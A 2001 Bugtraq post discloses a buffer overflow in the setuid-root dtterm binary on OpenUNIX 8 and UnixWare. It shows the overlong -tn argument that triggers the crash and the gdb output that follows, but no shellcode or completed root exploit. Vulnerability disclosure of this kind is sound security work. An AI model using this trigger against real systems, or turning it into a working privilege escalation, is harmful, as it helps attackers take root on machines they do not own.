[22766] in bugtraq
OpenUNIX 8 & Unixware possible local root
daemon@ATHENA.MIT.EDU (Aycan Irican)
Tue Oct 2 13:13:22 2001
Message-Id: <200110020554.f925so307218@mars.prosoft.com.tr>
Content-Type: text/plain;
charset="iso-8859-9"
From: Aycan Irican <aycan@mars.prosoft.com.tr>
Reply-To: aycan@prosoft.com.tr
To: bugtraq@securityfocus.com
Date: Tue, 2 Oct 2001 08:54:42 +0300
Cc: evrim@envy.com.tr
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Another dt series bug...
$ uname -a
OpenUNIX zen 5 8.0.0 i386 x86at Caldera UNIX_SVR5
$ id
uid=101(fixxxer) gid=1(other)
$ ls -al /usr/dt/bin/dtterm
- -r-sr-xr-x 1 root bin 60892 Haz 10 05:03
/usr/dt/bin/dtterm
$ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
Warning: Missing charsets in String to FontSet conversion
Warning: Missing charsets in String to FontSet conversion
Memory fault
# /usr/gnu/bin/gdb /usr/dt/bin/dtterm
(no debugging symbols found)...
(gdb) set args -tn `perl -e 'print "A"x1040'`
(gdb) run
Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1040'`
(no debugging symbols found)...(no debugging symbols found)...
...
..
[New LWP 2]
Program received signal SIGSEGV, Segmentation fault.
0xbff9a4b8 in strncmp () from /usr/lib/libc.so.1
[New Thread 1]
(gdb)set args -tn `perl -e 'print "A"x1042'`
(gdb) run
Starting program: /usr/dt/bin/dtterm -tn `perl -e 'print "A"x1042'`
(no debugging symbols found)...(no debugging symbols found)...
[New LWP 2]
Program received signal SIGSEGV, Segmentation fault.
0xbff3abca in _mergeEnv () from /usr/dt/lib/libDtTerm.so.1
[New Thread 1]
(gdb)q
self-explained...
enjoy...
- --
Aycan Ŭrican
Systems Engineer
Prosoft Communication Systems Ltd.
Resit Galip Cad. 85/2 Gaziosmanpaŝa 06700 Ankara
Tel:+90-312-446-6616 Fax:+90-312-446-2423
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE7uVaiJZJwgy0AK78RAsbKAJ0Y8YiCi+yagy2ep42v8wfsu+dsFQCdFIUt
5M67ZahjhrfqnvdlMsqE4SM=
=CNXa
-----END PGP SIGNATURE-----
